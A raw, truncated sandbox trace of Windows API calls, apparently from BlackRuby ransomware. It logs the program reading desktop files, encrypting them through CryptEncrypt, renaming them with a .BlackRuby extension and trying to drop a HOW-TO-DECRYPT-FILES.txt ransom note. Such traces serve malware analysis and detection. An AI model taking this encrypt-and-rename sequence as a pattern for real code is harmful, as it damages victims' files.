lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_oEb6csUrbS9RoubBKE5GFmJ6B4hr52r5p8yNb7f9i1zZw.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_oeb6csurbs9roubbke5gfmj6b4hr52r5p8ynb7f9i1zzw.blackruby")) returned 1 [0056.136] GetLastError () returned 0xb7 [0056.136] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.136] GetLastError () returned 0xb7 [0056.136] SetErrorMode (uMode=0x1) returned 0x0 [0056.136] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.137] GetLastError () returned 0x5 [0056.138] SetErrorMode (uMode=0x0) returned 0x1 [0056.138] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", lpFilePart=0x0) returned 0x20 [0056.138] GetLastError () returned 0x5 [0056.138] SetErrorMode (uMode=0x1) returned 0x0 [0056.138] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\rvs.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1cdf618 | out: lpFileInformation=0x1cdf618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e8bdb0, ftCreationTime.dwHighDateTime=0x1d35221, ftLastAccessTime.dwLowDateTime=0x3a072080, ftLastAccessTime.dwHighDateTime=0x1d35260, ftLastWriteTime.dwLowDateTime=0x3a072080, ftLastWriteTime.dwHighDateTime=0x1d35260, nFileSizeHigh=0x0, nFileSizeLow=0xb2da)) returned 1 [0056.138] GetLastError () returned 0x5 [0056.138] SetErrorMode (uMode=0x0) returned 0x1 [0056.138] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", lpFilePart=0x0) returned 0x20 [0056.138] GetLastError () returned 0x5 [0056.138] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", lpFilePart=0x0) returned 0x20 [0056.139] GetLastError () returned 0x5 [0056.139] SetErrorMode (uMode=0x1) returned 0x0 [0056.139] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\rvs.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.139] GetLastError () returned 0x0 [0056.139] GetFileType (hFile=0x184) returned 0x1 [0056.139] SetErrorMode (uMode=0x0) returned 0x1 [0056.139] GetFileType (hFile=0x184) returned 0x1 [0056.139] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xb2da [0056.139] GetLastError () returned 0x0 [0056.139] ReadFile (in: hFile=0x184, lpBuffer=0x1ce1180, nNumberOfBytesToRead=0xb2da, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ce1180*, lpNumberOfBytesRead=0x18ed84*=0xb2da, lpOverlapped=0x0) returned 1 [0056.140] GetLastError () returned 0x0 [0056.140] CloseHandle (hObject=0x184) returned 1 [0056.140] GetLastError () returned 0x0 [0056.140] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", lpFilePart=0x0) returned 0x20 [0056.140] GetLastError () returned 0x0 [0056.140] SetErrorMode (uMode=0x1) returned 0x0 [0056.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\rvs.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e8bdb0, ftCreationTime.dwHighDateTime=0x1d35221, ftLastAccessTime.dwLowDateTime=0x3a072080, ftLastAccessTime.dwHighDateTime=0x1d35260, ftLastWriteTime.dwLowDateTime=0x3a072080, ftLastWriteTime.dwHighDateTime=0x1d35260, nFileSizeHigh=0x0, nFileSizeLow=0xb2da)) returned 1 [0056.140] GetLastError () returned 0x0 [0056.140] SetErrorMode (uMode=0x0) returned 0x1 [0056.140] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0056.140] GetLastError () returned 0x0 [0056.173] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1d51ab8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ea0) returned 1 [0056.173] GetLastError () returned 0x0 [0056.173] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.173] GetLastError () returned 0x0 [0056.180] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.180] GetLastError () returned 0x0 [0056.180] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ce0) returned 1 [0056.180] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.180] GetLastError () returned 0x0 [0056.180] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1b7c650*=0x1, dwFlags=0x0) returned 1 [0056.180] GetLastError () returned 0x0 [0056.180] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1b7c61c, dwFlags=0x0) returned 1 [0056.180] GetLastError () returned 0x0 [0056.180] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7c698*, pdwDataLen=0x18ed74*=0xb3d0, dwBufLen=0xb3d0 | out: pbData=0x1b7c698*, pdwDataLen=0x18ed74*=0xb3d0) returned 1 [0056.181] GetLastError () returned 0x0 [0056.181] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b92e64*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b92e64*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.181] GetLastError () returned 0x0 [0056.181] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b92e94*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b92e94*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.181] GetLastError () returned 0x0 [0056.182] CryptDestroyKey (hKey=0x360ea0) returned 1 [0056.182] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.182] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0056.182] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", lpFilePart=0x0) returned 0x20 [0056.182] GetLastError () returned 0x0 [0056.182] SetErrorMode (uMode=0x1) returned 0x0 [0056.182] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\rvs.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.183] GetLastError () returned 0xb7 [0056.183] GetFileType (hFile=0x184) returned 0x1 [0056.183] SetErrorMode (uMode=0x0) returned 0x1 [0056.183] GetFileType (hFile=0x184) returned 0x1 [0056.184] CloseHandle (hObject=0x184) returned 1 [0056.185] GetLastError () returned 0xb7 [0056.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp", lpFilePart=0x0) returned 0x20 [0056.185] GetLastError () returned 0xb7 [0056.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_b6dJhw5fw6pkGoxwTVHVmjjhQSpqvNFy1X1Jd0M.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_b6dJhw5fw6pkGoxwTVHVmjjhQSpqvNFy1X1Jd0M.BlackRuby", lpFilePart=0x0) returned 0x54 [0056.185] GetLastError () returned 0xb7 [0056.185] SetErrorMode (uMode=0x1) returned 0x0 [0056.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\rvs.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e8bdb0, ftCreationTime.dwHighDateTime=0x1d35221, ftLastAccessTime.dwLowDateTime=0x3a072080, ftLastAccessTime.dwHighDateTime=0x1d35260, ftLastWriteTime.dwLowDateTime=0x29aee8c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb3e0)) returned 1 [0056.185] GetLastError () returned 0xb7 [0056.185] SetErrorMode (uMode=0x0) returned 0x1 [0056.185] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\rVS.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\rvs.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_b6dJhw5fw6pkGoxwTVHVmjjhQSpqvNFy1X1Jd0M.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_b6djhw5fw6pkgoxwtvhvmjjhqspqvnfy1x1jd0m.blackruby")) returned 1 [0056.186] GetLastError () returned 0xb7 [0056.186] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.186] GetLastError () returned 0xb7 [0056.186] SetErrorMode (uMode=0x1) returned 0x0 [0056.186] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.186] GetLastError () returned 0x5 [0056.187] SetErrorMode (uMode=0x0) returned 0x1 [0056.187] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", lpFilePart=0x0) returned 0x24 [0056.187] GetLastError () returned 0x5 [0056.187] SetErrorMode (uMode=0x1) returned 0x0 [0056.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps" (normalized: "c:\\users\\eebsym5\\desktop\\twjggaw.pps"), fInfoLevelId=0x0, lpFileInformation=0x1bbb320 | out: lpFileInformation=0x1bbb320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0b46d0, ftCreationTime.dwHighDateTime=0x1d35015, ftLastAccessTime.dwLowDateTime=0x85212b20, ftLastAccessTime.dwHighDateTime=0x1d34d8c, ftLastWriteTime.dwLowDateTime=0x85212b20, ftLastWriteTime.dwHighDateTime=0x1d34d8c, nFileSizeHigh=0x0, nFileSizeLow=0x11b83)) returned 1 [0056.187] GetLastError () returned 0x5 [0056.187] SetErrorMode (uMode=0x0) returned 0x1 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", lpFilePart=0x0) returned 0x24 [0056.188] GetLastError () returned 0x5 [0056.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", lpFilePart=0x0) returned 0x24 [0056.188] GetLastError () returned 0x5 [0056.188] SetErrorMode (uMode=0x1) returned 0x0 [0056.188] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps" (normalized: "c:\\users\\eebsym5\\desktop\\twjggaw.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.188] GetLastError () returned 0x0 [0056.188] GetFileType (hFile=0x184) returned 0x1 [0056.188] SetErrorMode (uMode=0x0) returned 0x1 [0056.188] GetFileType (hFile=0x184) returned 0x1 [0056.188] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x11b83 [0056.188] GetLastError () returned 0x0 [0056.188] ReadFile (in: hFile=0x184, lpBuffer=0x1bbd3e0, nNumberOfBytesToRead=0x11b83, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1bbd3e0*, lpNumberOfBytesRead=0x18ed84*=0x11b83, lpOverlapped=0x0) returned 1 [0056.189] GetLastError () returned 0x0 [0056.189] CloseHandle (hObject=0x184) returned 1 [0056.189] GetLastError () returned 0x0 [0056.189] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", lpFilePart=0x0) returned 0x24 [0056.189] GetLastError () returned 0x0 [0056.189] SetErrorMode (uMode=0x1) returned 0x0 [0056.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps" (normalized: "c:\\users\\eebsym5\\desktop\\twjggaw.pps"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0b46d0, ftCreationTime.dwHighDateTime=0x1d35015, ftLastAccessTime.dwLowDateTime=0x85212b20, ftLastAccessTime.dwHighDateTime=0x1d34d8c, ftLastWriteTime.dwLowDateTime=0x85212b20, ftLastWriteTime.dwHighDateTime=0x1d34d8c, nFileSizeHigh=0x0, nFileSizeLow=0x11b83)) returned 1 [0056.189] GetLastError () returned 0x0 [0056.189] SetErrorMode (uMode=0x0) returned 0x1 [0056.189] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0056.190] GetLastError () returned 0x0 [0056.223] CryptImportKey (in: hProv=0x37c790, pbData=0x1c3ae7c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360f60) returned 1 [0056.223] GetLastError () returned 0x0 [0056.224] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.224] GetLastError () returned 0x0 [0056.229] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.229] GetLastError () returned 0x0 [0056.229] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d20) returned 1 [0056.229] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.229] GetLastError () returned 0x0 [0056.229] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1c67ec8*=0x1, dwFlags=0x0) returned 1 [0056.229] GetLastError () returned 0x0 [0056.229] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1c67e94, dwFlags=0x0) returned 1 [0056.229] GetLastError () returned 0x0 [0056.229] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c67f10*, pdwDataLen=0x18ed74*=0x11c80, dwBufLen=0x11c80 | out: pbData=0x1c67f10*, pdwDataLen=0x18ed74*=0x11c80) returned 1 [0056.229] GetLastError () returned 0x0 [0056.229] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8b83c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c8b83c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0056.229] GetLastError () returned 0x0 [0056.229] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c8b86c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c8b86c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0056.229] GetLastError () returned 0x0 [0056.231] CryptDestroyKey (hKey=0x360f60) returned 1 [0056.231] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.231] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0056.231] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", lpFilePart=0x0) returned 0x24 [0056.231] GetLastError () returned 0x0 [0056.231] SetErrorMode (uMode=0x1) returned 0x0 [0056.231] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps" (normalized: "c:\\users\\eebsym5\\desktop\\twjggaw.pps"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.232] GetLastError () returned 0xb7 [0056.232] GetFileType (hFile=0x184) returned 0x1 [0056.232] SetErrorMode (uMode=0x0) returned 0x1 [0056.232] GetFileType (hFile=0x184) returned 0x1 [0056.234] CloseHandle (hObject=0x184) returned 1 [0056.234] GetLastError () returned 0xb7 [0056.234] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps", lpFilePart=0x0) returned 0x24 [0056.234] GetLastError () returned 0xb7 [0056.234] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_OwfWl1eUGhW4iiJhcmTkJf0IeswpmjdsBw4FfC3Ipmd9jU.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_OwfWl1eUGhW4iiJhcmTkJf0IeswpmjdsBw4FfC3Ipmd9jU.BlackRuby", lpFilePart=0x0) returned 0x5b [0056.234] GetLastError () returned 0xb7 [0056.234] SetErrorMode (uMode=0x1) returned 0x0 [0056.234] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps" (normalized: "c:\\users\\eebsym5\\desktop\\twjggaw.pps"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0b46d0, ftCreationTime.dwHighDateTime=0x1d35015, ftLastAccessTime.dwLowDateTime=0x85212b20, ftLastAccessTime.dwHighDateTime=0x1d34d8c, ftLastWriteTime.dwLowDateTime=0x29b60ce0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11c90)) returned 1 [0056.234] GetLastError () returned 0xb7 [0056.234] SetErrorMode (uMode=0x0) returned 0x1 [0056.234] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\twJgGAw.pps" (normalized: "c:\\users\\eebsym5\\desktop\\twjggaw.pps"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_OwfWl1eUGhW4iiJhcmTkJf0IeswpmjdsBw4FfC3Ipmd9jU.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_owfwl1eughw4iijhcmtkjf0ieswpmjdsbw4ffc3ipmd9ju.blackruby")) returned 1 [0056.235] GetLastError () returned 0xb7 [0056.235] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0056.235] GetLastError () returned 0xb7 [0056.235] SetErrorMode (uMode=0x1) returned 0x0 [0056.235] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.236] GetLastError () returned 0x5 [0056.236] SetErrorMode (uMode=0x0) returned 0x1 [0056.236] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", lpFilePart=0x0) returned 0x2c [0056.236] GetLastError () returned 0x5 [0056.236] SetErrorMode (uMode=0x1) returned 0x0 [0056.237] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\tyetf2bdpdutv05.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1cba5e0 | out: lpFileInformation=0x1cba5e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa45b2340, ftCreationTime.dwHighDateTime=0x1d34a7d, ftLastAccessTime.dwLowDateTime=0xaf8bfdb0, ftLastAccessTime.dwHighDateTime=0x1d35415, ftLastWriteTime.dwLowDateTime=0xaf8bfdb0, ftLastWriteTime.dwHighDateTime=0x1d35415, nFileSizeHigh=0x0, nFileSizeLow=0x5c26)) returned 1 [0056.237] GetLastError () returned 0x5 [0056.237] SetErrorMode (uMode=0x0) returned 0x1 [0056.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", lpFilePart=0x0) returned 0x2c [0056.237] GetLastError () returned 0x5 [0056.237] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", lpFilePart=0x0) returned 0x2c [0056.237] GetLastError () returned 0x5 [0056.237] SetErrorMode (uMode=0x1) returned 0x0 [0056.237] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\tyetf2bdpdutv05.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.237] GetLastError () returned 0x0 [0056.237] GetFileType (hFile=0x184) returned 0x1 [0056.237] SetErrorMode (uMode=0x0) returned 0x1 [0056.237] GetFileType (hFile=0x184) returned 0x1 [0056.237] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5c26 [0056.237] GetLastError () returned 0x0 [0056.237] ReadFile (in: hFile=0x184, lpBuffer=0x1cbc5f0, nNumberOfBytesToRead=0x5c26, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cbc5f0*, lpNumberOfBytesRead=0x18ed84*=0x5c26, lpOverlapped=0x0) returned 1 [0056.238] GetLastError () returned 0x0 [0056.238] CloseHandle (hObject=0x184) returned 1 [0056.238] GetLastError () returned 0x0 [0056.238] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4", lpFilePart=0x0) returned 0x2c [0056.238] GetLastError () returned 0x0 [0056.238] SetErrorMode (uMode=0x1) returned 0x0 [0056.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TyeTF2BDpDutV05.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\tyetf2bdpdutv05.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa45b2340, ftCreationTime.dwHighDateTime=0x1d34a7d, ftLastAccessTime.dwLowDateTime=0xaf8bfdb0, ftLastAccessTime.dwHighDateTime=0x1d35415, ftLastWriteTime.dwLowDateTime=0xaf8bfdb0, ftLastWriteTime.dwHighDateTime=0x1d35415, nFileSizeHigh=0x0, nFileSizeLow=0x5c26)) returned 1 [0056.238] GetLastError () returned 0x0 [0056.238] SetErrorMode (uMode=0x0) returned 0x1 [0056.249] CryptImportKey (in: hProv=0x37c680, pbData=0x1d221fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0056.249] GetLastError () returned 0x0 [0056.249] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.249] GetLastError () returned 0x0 [0056.254] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.254] GetLastError () returned 0x0 [0056.254] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x3609e0) returned 1 [0056.254] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.254] GetLastError () returned 0x0 [0056.254] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1d4f248*=0x1, dwFlags=0x0) returned 1 [0056.254] GetLastError () returned 0x0 [0056.254] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1d4f214, dwFlags=0x0) returned 1 [0056.254] GetLastError () returned 0x0 [0056.254] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d4f290*, pdwDataLen=0x18ed74*=0x5d20, dwBufLen=0x5d20 | out: pbData=0x1d4f290*, pdwDataLen=0x18ed74*=0x5d20) returned 1 [0056.254] GetLastError () returned 0x0 [0056.257] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b56974*, 